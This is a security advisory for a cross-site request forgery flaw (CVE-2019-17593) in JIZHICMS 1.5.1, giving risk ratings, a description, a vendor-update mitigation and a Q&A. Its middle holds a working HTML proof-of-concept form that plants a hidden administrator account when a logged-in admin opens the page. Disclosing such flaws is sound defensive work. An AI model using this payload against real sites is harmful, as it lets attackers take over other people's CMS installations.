Cross-site request forgery in JIZHICMS



Published: 2019-10-15
Risk Low
Patch available YES
Number of vulnerabilities 1
CVE-ID CVE-2019-17593
CWE-ID CWE-352
Exploitation vector Network
Public exploit Public exploit code for vulnerability #1 is available.
Vulnerable software
Subscribe
jizhicms
Web applications / CMS

Vendor Cheshire cat

Security Bulletin

This security bulletin contains one low risk vulnerability.

1) Cross-site request forgery

EUVDB-ID: #VU21794

Risk: Low

CVSSv3.1: 5.5 [CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RL:O/RC:C]

CVE-ID: CVE-2019-17593

CWE-ID: CWE-352 - Cross-Site Request Forgery (CSRF)

Exploit availability: No

Description

The vulnerability allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin in " admin.php/Admin/adminadd.html". A remote attacker can trick the victim to visit a specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as add an administrator.

PoC:

 <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://ip/admin.php/Admin/adminadd.html" method="POST">
      <input type="hidden" name="name" value="test123" />
      <input type="hidden" name="tel" value="" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="gid" value="1" />
      <input type="hidden" name="pass" value="123456" />
      <input type="hidden" name="repass" value="123456" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="go" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Mitigation

Install update from vendor's website.

Vulnerable software versions

jizhicms: 1.5.1

External links

http://github.com/Cherry-toto/jizhicms/issues/1


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.



###SIDEBAR###